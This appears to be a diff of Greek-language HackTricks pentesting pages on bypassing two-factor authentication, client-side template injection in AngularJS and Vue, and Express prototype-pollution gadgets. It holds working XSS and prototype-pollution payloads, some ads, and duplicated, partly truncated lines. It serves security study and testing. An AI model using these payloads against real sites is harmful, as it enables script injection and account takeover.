Η επαναχρησιμοποίηση προηγουμένως χρησιμοποιημένων διακριτικών για ταυτοποίηση εντός ενός λογαριασμού μπορεί να είναι αποτελεσματική.
|
||||
|
||||
### **Χρήση Μη Χρησιμοποιημένων Διακριτικών**
|
||||
|
||||
Η εξαγωγή ενός διακριτικού από τον δικό σας λογαριασμό για να παρακάμψετε την 2FA σε έναν άλλο λογαριασμό μπορεί να είναι μια προσπάθεια.
|
||||
|
||||
### **Αποκάλυψη Διακριτικού**
|
||||
|
||||
Ερευνήστε εάν το διακριτικό αποκαλύπτεται σε μια απόκριση από την ιστοσελίδα.
|
||||
Εξετάστε εάν το διακριτικό αποκαλύπτεται σε μια απάντηση από την ιστοσελίδα.
|
||||
|
||||
### **Εκμετάλλευση Συνδέσμου Επαλήθευσης**
|
||||
|
||||
Η χρήση του **συνδέσμου επαλήθευσης μέσω email που αποστέλλεται κατά τη δημιουργία λογαριασμού** μπορεί να επιτρέψει την πρόσβαση στο προφίλ χωρίς 2FA, όπως αναφέρεται σε ένα λεπτομερές [άρθρο](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).
|
||||
Η χρήση του **συνδέσμου επαλήθευσης μέσω email που στέλνεται κατά τη δημιουργία λογαριασμού** μπορεί να επιτρέψει την πρόσβαση στο προφίλ χωρίς 2FA, όπως αναφέρεται σε ένα λεπτομερές [άρθρο](https://srahulceh.medium.com/behind-the-scenes-of-a-security-bug-the-perils-of-2fa-cookie-generation-496d9519771b).
|
||||
|
||||
### **Διαχείριση Συνεδρίας**
|
||||
|
||||
Η έναρξη συνεδριών για τον λογαριασμό του χρήστη και ενός θύματος, και η ολοκλήρωση της 2FA για τον λογαριασμό του χρήστη χωρίς να προχωρήσει, επιτρέπει την προσπάθεια πρόσβασης στο επόμενο βήμα στη ροή του λογαριασμού του θύματος, εκμεταλλευόμενο τους περιορισμούς διαχείρισης συνεδριών στο backend.
|
||||
Η έναρξη συνεδριών τόσο για τον λογαριασμό του χρήστη όσο και για τον λογαριασμό ενός θύματος, και η ολοκλήρωση της 2FA για τον λογαριασμό του χρήστη χωρίς να προχωρήσει, επιτρέπει μια προσπάθεια πρόσβασης στο επόμενο βήμα στη ροή του λογαριασμού του θύματος, εκμεταλλευόμενο τους περιορισμούς διαχείρισης συνεδριών στο backend.
|
||||
|
||||
### **Μηχανισμός Επαναφοράς Κωδικού Πρόσβασης**
|
||||
|
||||
Η έρευνα της λειτουργίας επαναφοράς κωδικού πρόσβασης, η οποία συνδέει έναν χρήστη στην εφαρμογή μετά την επαναφορά, για τη δυνατότητά της να επιτρέπει πολλαπλές επαναφορές χρησιμοποιώντας τον ίδιο σύνδεσμο είναι κρίσιμη. Η σύνδεση με τα νεότερα διαπιστευτήρια πρόσβασης μπορεί να παρακάμψει την 2FA.
|
||||
Η έρευνα της λειτουργίας επαναφοράς κωδικού πρόσβασης, η οποία συνδέει έναν χρήστη στην εφαρμογή μετά την επαναφορά, για τη δυνατότητά της να επιτρέψει πολλαπλές επαναφορές χρησιμοποιώντας τον ίδιο σύνδεσμο είναι κρίσιμη. Η σύνδεση με τα νέα δεδομένα πρόσβασης μπορεί να παρακάμψει την 2FA.
|
||||
|
||||
### **Παραβίαση Πλατφόρμας OAuth**
|
||||
### **Παράκαμψη Πλατφόρμας OAuth**
|
||||
|
||||
Η παραβίαση του λογαριασμού ενός χρήστη σε μια αξιόπιστη πλατφόρμα **OAuth** (π.χ., Google, Facebook) μπορεί να προσφέ
|
||||
Η διαρροή του λογαριασμού ενός χρήστη σε μια αξιόπιστη πλατφόρμα **OAuth** (π.χ., Google, Facebook) μπορεί να προσφέρει μια διαδρομή για την παράκαμψη της 2FA.
|
||||
|
||||
### **Επιθέσεις Βίας Κωδικού**
|
||||
|
||||
#### **Απουσία Όριου Ρυθμού**
|
||||
|
||||
Η έλλειψη ορίου στον αριθμό των προσπαθειών κωδικού επιτρέπει επιθέσεις βίας, αν και πρέπει να ληφθεί υπόψη η πιθανή σιωπηρή περιορισμένη ροή.
|
||||
|
||||
#### **Αργή Επίθεση Βίας**
|
||||
|
||||
Μια αργή επίθεση βίας είναι εφικτή όπου υπάρχουν όρια ρυθμού ροής χωρίς ένα κυρίως όριο ρυθμού.
|
||||
|
||||
#### **Επαναποστολή Κωδικού Επαναφοράς Όριου Ρυθμού**
|
||||
|
||||
Η επανάληψη του κωδικού επαναφοράς επαναφέρει το όριο ρυθμού, διευκολύνοντας τις συνεχείς προσπάθειες βίας.
|
||||
|
||||
#### **Παράκαμψη Όριου Ρυθμού Πελάτη**
|
||||
|
||||
Ένα έγγραφο αναλύει τεχνικές για την παράκαμψη της περιορισμένης ροής στον πελάτη.
|
||||
|
||||
#### **Εσωτερικές Ενέργειες Χωρίς Όριο Ρυθμού**
|
||||
|
||||
Τα όρια ρυθμού μπορεί να προστατεύουν τις προσπάθειες σύνδεσης αλλά όχι τις εσωτερικές ενέργειες λογαριασμού.
|
||||
|
||||
#### **Κόστη Επανάληψης Κωδικού SMS**
|
||||
|
||||
Η υπερβολική επανάληψη κωδικών μέσω SMS επιφέρει κόστη για την εταιρεία, αν και δεν παρακάμπτει την 2FA.
|
||||
|
||||
#### **Ατέλειωτη Αναγέννηση OTP**
|
||||
|
||||
Η ατέλειωτη αναγέννηση OTP με απλούς κωδικούς επιτρέπει τη βία με την επανάληψη ενός μικρού σετ κωδικών.
|
||||
|
||||
### **Εκμετάλλευση Συνθήκης Αγώνα**
|
||||
|
||||
Η εκμετάλλευση συνθηκών αγώνα για την παράκαμψη της 2FA μπορεί να βρεθεί σε ένα συγκεκριμένο έγγραφο.
|
||||
|
||||
### **Ευπάθειες CSRF/Clickjacking**
|
||||
|
||||
Η εξερεύνηση ευπαθειών CSRF ή Clickjacking για την απενεργοποίηση της 2FA είναι μια εφικτή στρατηγική.
|
||||
|
||||
### **Εκμετάλλευση Χαρακτηριστικού "Θυμήσου με"**
|
||||
|
||||
#### **Προβλέψιμες Τιμές Μπισκότου**
|
||||
|
||||
Η μαντεψιά της τιμής του μπισκότου "θυμήσου με" μπορεί να παρακάμψει τους περιορισμούς.
|
||||
|
||||
#### **
|
||||
|
|
|
@ -1,27 +1,40 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
# Περίληψη
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Είναι σαν ένα [**Server Side Template Injection**](ssti-server-side-template-injection/) αλλά στο **πελάτη**. Το **SSTI** μπορεί να σας επιτρέψει να **εκτελέσετε κώδικα** στον απομακρυσμένο διακομιστή, το **CSTI** θα μπορούσε να σας επιτρέψει να **εκτελέσετε αυθαίρετο κώδικα JavaScript** στον browser του θύματος.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Η **Δοκιμή** για αυτή την ευπάθεια είναι πολύ **παρόμοια** με αυτήν του **SSTI**, ο διερμηνέας περιμένει **ένα πρότυπο** και θα το εκτελέσει. Για παράδειγμα, με ένα φορτίο όπως `{{ 7-7 }}`, αν η εφαρμογή είναι **ευάθροτη** θα δείτε ένα `0`, και αν όχι, θα δείτε το αρχικό: `{{ 7-7 }}`
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
# Σύνοψη
|
||||
|
||||
Είναι σαν ένα [**Server Side Template Injection**](ssti-server-side-template-injection/) αλλά στον **πελάτη**. Το **SSTI** μπορεί να σας επιτρέψει να **εκτελέσετε κώδικα** στον απομακρυσμένο διακομιστή, το **CSTI** θα μπορούσε να σας επιτρέψει να **εκτελέσετε αυθαίρετο κώδικα JavaScript** στον περιηγητή του θύματος.
|
||||
|
||||
Η **δοκιμή** για αυτήν την ευπάθεια είναι πολύ **παρόμοια** με την περίπτωση του **SSTI**, ο διερμηνευτής περιμένει **ένα πρότυπο** και θα το εκτελέσει. Για παράδειγμα, με ένα φορτίο όπως `{{ 7-7 }}`, αν η εφαρμογή είναι **ευάθροτη** θα δείτε ένα `0`, και αν όχι, θα δείτε το αρχικό: `{{ 7-7 }}`
|
||||
|
||||
# AngularJS
|
||||
|
||||
Το AngularJS είναι ένα δημοφιλές πλαίσιο JavaScript που αλληλεπιδρά με το HTML μέσω χαρακτηριστικών που ονομάζονται οδηγίες, ένα αξιοσημείωτο είναι το **`ng-app`**. Αυτή η οδηγία επιτρέπει στο AngularJS να επεξεργαστεί το περιεχόμενο HTML, επιτρέποντας την εκτέλεση εκφράσεων JavaScript μέσα σε διπλά αγκύλες.
|
||||
Το AngularJS είναι ένα δημοφιλές πλαίσιο JavaScript που αλληλεπιδρά με το HTML μέσω χαρακτηριστικών που ονομάζονται οδηγίες, μια από τις πιο γνωστές είναι το **`ng-app`**. Αυτή η οδηγία επιτρέπει στο AngularJS να επεξεργαστεί το περιεχόμενο HTML, επιτρέποντας την εκτέλεση εκφράσεων JavaScript μέσα σε διπλές αγκύλες.
|
||||
|
||||
Σε περιπτώσεις όπου η είσοδος χρήστη εισάγεται δυναμικά στο σώμα HTML με ετικέτες `ng-app`, είναι δυνατή η εκτέλεση αυθαίρετου κώδικα JavaScript. Αυτό μπορεί να επιτευχθεί εκμεταλλευόμενος τη σύνταξη του AngularJS μέσα στην είσοδο. Παρακάτω παρουσιάζονται παραδείγματα που δείχνουν πώς μπορεί να εκτελεστεί κώδικας JavaScript:
|
||||
```javascript
|
||||
|
@ -40,10 +53,10 @@
|
|||
|
||||
# VueJS
|
||||
|
||||
Μπορείτε να βρείτε μια **ευάθροιστη υλοποίηση Vue** στο [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
|
||||
Μπορείτε να βρείτε μια **ευάθροτη υλοποίηση Vue** στο [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
|
||||
Λειτουργικό payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
|
||||
|
||||
Και ο **κώδικας πηγής** του ευάθροιστου παραδείγματος εδώ: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
Και ο **κώδικας πηγής** του ευάθροτου παραδείγματος εδώ: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
|
||||
```markup
|
||||
<!-- Google Research - Vue.js-->
|
||||
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
|
||||
|
@ -60,7 +73,7 @@
|
|||
```
|
||||
{{constructor.constructor('alert(1)')()}}
|
||||
```
|
||||
Πιστώσεις: [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
Credit: [Mario Heiderich](https://twitter.com/cure53berlin)
|
||||
|
||||
**Ελέγξτε περισσότερα payloads VUE στο** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)
|
||||
|
||||
|
@ -80,23 +93,34 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
|||
<a href=[javascript&':alert(1)']>test</a>
|
||||
[self.alert(1)mod1]
|
||||
```
|
||||
**Περισσότερα φορτία στο** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
|
||||
**Περισσότερα payloads στο** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)
|
||||
|
||||
# **Λίστα Ανίχνευσης Βίας**
|
||||
|
||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**Την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,26 +1,40 @@
|
|||
# Εργαλεία για την Προτοτυποποίηση του Πρωτοκόλλου του Express
|
||||
# Εργαλεία Πρωτοτύπου Ρύπανσης στο Express
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## Εξυπηρετήστε απαντήσεις XSS
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Εξυπηρέτηση απαντήσεων XSS
|
||||
|
||||
**Για περισσότερες λεπτομέρειες [ανατρέξτε στην αρχική έρευνα](https://portswigger.net/research/server-side-prototype-pollution)**
|
||||
|
||||
### Αλλαγή του τύπου περιεχομένου JSON σε HTML
|
||||
|
||||
Σε μια εφαρμογή Express που χρησιμοποιεί μια **απόκριση με τύπο περιεχομένου JSON** και αντανακλά ένα JSON:
|
||||
Σε μια εφαρμογή Express που χρησιμοποιεί μια **απόκριση τύπου περιεχομένου JSON** και αντανακλά ένα JSON:
|
||||
```javascript
|
||||
app.use(bodyParser.json({type: 'application/json'}));
|
||||
app.post('/', function(req, res){
|
||||
|
@ -28,11 +42,11 @@ _.merge({}, req.body);
|
|||
res.send(req.body);
|
||||
});
|
||||
```
|
||||
Σε αυτές τις περιπτώσεις, δεν είναι συνήθως δυνατή η εκτέλεση XSS με τύπο περιεχομένου JSON. Ωστόσο, με την προσβασιμότητα του πρωτοτύπου μπορούμε να **παραπλανήσουμε το Express να εξυπηρετήσει μια απόκριση HTML**. Αυτή η ευπάθεια βασίζεται στην εφαρμογή της εντολής **`res.send(obj)`** και στη χρήση του body parser με τον τύπο περιεχομένου application/json.
|
||||
Σε αυτές τις περιπτώσεις το XSS συνήθως δεν είναι δυνατό με έναν τύπο περιεχομένου JSON. Ωστόσο, με τη χρήση της πρωτοτύπου μόλυνσης μπορούμε **να μπερδέψουμε το Express ώστε να εξυπηρετήσει μια απάντηση HTML.** Αυτή η ευπάθεια βασίζεται στην εφαρμογή της εντολής **`res.send(obj)`** και στη χρήση του body parser με τον τύπο περιεχομένου application/json.
|
||||
```json
|
||||
{"__proto__":{"_body":true,"body":"<script>evil()"}}
|
||||
```
|
||||
Με το **μολυσμένο** **`body`** και **`_body`** ιδιότητες, είναι δυνατόν να προκαλέσετε το **Express να εξυπηρετήσει τον τύπο περιεχομένου HTML** και να αντανακλά την ιδιότητα `_body`, με αποτέλεσμα την αποθηκευμένη XSS.
|
||||
Με το **`ρύπανση`** των ιδιοτήτων **`body`** και **`_body`**, είναι δυνατόν να προκαλέσετε το **Express να εξυπηρετήσει τον τύπο περιεχομένου HTML** και να αντανακλά την ιδιότητα `_body`, με αποτέλεσμα την αποθηκευμένη XSS.
|
||||
|
||||
### Απεικόνιση UTF7
|
||||
|
||||
|
@ -40,29 +54,29 @@ res.send(req.body);
|
|||
```json
|
||||
{"__proto__":{"content-type": "application/json; charset=utf-7"}}
|
||||
```
|
||||
## Ασφαλείς τεχνικές σάρωσης
|
||||
## Ασφαλείς Τεχνικές Σάρωσης
|
||||
|
||||
### Κενά JSON
|
||||
### Χώροι JSON
|
||||
|
||||
Το παρακάτω PP θα προσθέσει ένα επιπλέον κενό στα γνωρίσματα ενός JSON χωρίς να διακόψει τη λειτουργικότητα:
|
||||
Το παρακάτω PP θα κάνει τα χαρακτηριστικά μέσα σε ένα JSON να έχουν ένα επιπλέον κενό το οποίο δεν θα διακόψει τη λειτουργικότητα:
|
||||
```json
|
||||
{"__proto__":{"json spaces": " "}}
|
||||
```
|
||||
Έπειτα, ένα αντανακλασμένο JSON θα φαίνεται ως εξής:
|
||||
Έπειτα, ένα αντικατοπτρισμένο JSON θα φαίνεται ως:
|
||||
```json
|
||||
{"foo": "bar"} -- Note the extra space
|
||||
```
|
||||
### Αποκαλυμμένα Κεφαλίδες
|
||||
### Εκτεθειμένες Κεφαλίδες
|
||||
|
||||
Το παρακάτω PP gadget θα κάνει τον διακομιστή να στείλει πίσω την HTTP κεφαλίδα: **`Access-Control-Expose_headers: foo`**
|
||||
```json
|
||||
{"__proto__":{"exposedHeaders":["foo"]}}
|
||||
```
|
||||
Απαιτείται η εγκατάσταση του **CORS module**
|
||||
Απαιτείται η εγκατάσταση του **ενός εξωτερικού module CORS**
|
||||
|
||||
### **Μέθοδος OPTIONS**
|
||||
|
||||
Με τον παρακάτω φορτίο, είναι δυνατό να **αποκρύψετε μια μέθοδο από μια απάντηση OPTIONS**:
|
||||
Με το παρακάτω φορτίο, είναι δυνατόν να **κρύψετε έναν μέθοδο από μια απάντηση OPTIONS**:
|
||||
```javascript
|
||||
// Original reponse: POST,GET,HEAD
|
||||
|
||||
|
@ -73,34 +87,34 @@ res.send(req.body);
|
|||
```
|
||||
### **Κατάσταση**
|
||||
|
||||
Είναι δυνατόν να αλλάξετε τον **κωδικό κατάστασης που επιστρέφεται** χρησιμοποιώντας τον παρακάτω φορτίο PP:
|
||||
Είναι δυνατή η αλλαγή του **κωδικού κατάστασης που επιστρέφεται** χρησιμοποιώντας το ακόλουθο φορτίο PP:
|
||||
```json
|
||||
{"__proto__":{"status":510}}
|
||||
```
|
||||
### Σφάλμα
|
||||
|
||||
Όταν αναθέτετε σε ένα πρότυπο ένα πρωτογενές στοιχείο, όπως ένα αλφαριθμητικό, παράγεται μια λειτουργία **no-op καθώς το πρότυπο πρέπει να είναι ένα αντικείμενο**. Εάν προσπαθήσετε να αναθέσετε ένα αντικείμενο προτύπου στο ίδιο το `Object.prototype`, αυτό θα **εκτινάξει μια εξαίρεση**. Μπορούμε να χρησιμοποιήσουμε αυτές τις δύο συμπεριφορές για να **ανιχνεύσουμε εάν η προτύπωση του πρωτοτύπου ήταν επιτυχής**:
|
||||
Όταν αναθέτετε σε ένα πρότυπο ένα πρωτογενές στοιχείο όπως ένα string, παράγει μια λειτουργία **no-op καθώς το πρότυπο πρέπει να είναι ένα αντικείμενο**. Εάν προσπαθήσετε να αναθέσετε ένα αντικείμενο προτύπου στο ίδιο το `Object.prototype`, αυτό θα **εκτινάξει μια εξαίρεση**. Μπορούμε να χρησιμοποιήσουμε αυτές τις δύο συμπεριφορές για να **ανιχνεύσουμε εάν η μόλυνση του προτύπου ήταν επιτυχής**:
|
||||
```javascript
|
||||
({}).__proto__.__proto__={}//throws type exception
|
||||
({}).__proto__.__proto__="x"//no-op does not throw exception
|
||||
```
|
||||
### Ανακλαστική Τιμή
|
||||
### Αντανακλώμενη Τιμή
|
||||
|
||||
Όταν μια εφαρμογή περιλαμβάνει ένα αντικείμενο στην απόκρισή της, δημιουργώντας ένα χαρακτηριστικό με ένα **ασυνήθιστο όνομα δίπλα στο `__proto__`**, μπορεί να είναι ενδιαφέρον. Ειδικότερα, αν **μόνο το ασυνήθιστο χαρακτηριστικό επιστρέφεται** στην απόκριση, αυτό μπορεί να υποδηλώνει την ευπάθεια της εφαρμογής:
|
||||
Όταν μια εφαρμογή περιλαμβάνει ένα αντικείμενο στην απάντησή της, δημιουργώντας ένα γνώριμο με **ασυνήθιστο όνομα σε συνδυασμό με το `__proto__`** μπορεί να είναι ενδιαφέρον. Συγκεκριμένα, αν **επιστρέφεται μόνο το ασυνήθιστο γνώριμο στην απάντηση**, αυτό θα μπορούσε να υποδεικνύει την ευπάθεια της εφαρμογής:
|
||||
```json
|
||||
{"unusualName":"value","__proto__":"test"}
|
||||
```
|
||||
Επιπλέον, σε περιπτώσεις όπου χρησιμοποιείται μια βιβλιοθήκη όπως το Lodash, η ρύθμιση μιας ιδιότητας τόσο μέσω της προτύπου ρύπανσης (PP) όσο και απευθείας μέσα στο αντικείμενο προσφέρει μια άλλη διαγνωστική προσέγγιση. Εάν μια τέτοια ιδιότητα παραλείπεται από την απόκριση, υποδηλώνει ότι το Lodash επαληθεύει την ύπαρξη της ιδιότητας στον στόχο αντικείμενο πριν από τη συγχώνευση:
|
||||
Επιπλέον, σε σενάρια όπου χρησιμοποιείται μια βιβλιοθήκη όπως το Lodash, η ρύθμιση μιας ιδιότητας τόσο μέσω της μόλυνσης πρωτοτύπου (PP) όσο και απευθείας μέσα στο αντικείμενο προσφέρει μια άλλη διαγνωστική προσέγγιση. Αν μια τέτοια ιδιότητα παραλείπεται από την απόκριση, υποδηλώνει ότι το Lodash επαληθεύει την ύπαρξη της ιδιότητας στο στόχευτο αντικείμενο πριν τη συγχώνευση:
|
||||
```javascript
|
||||
{"__proto__":{"a":"value1"},"a":"value2","b":"value3"}
|
||||
// If 'b' is the only property reflected, this indicates prototype pollution in Lodash
|
||||
```
|
||||
## Διάφορα
|
||||
|
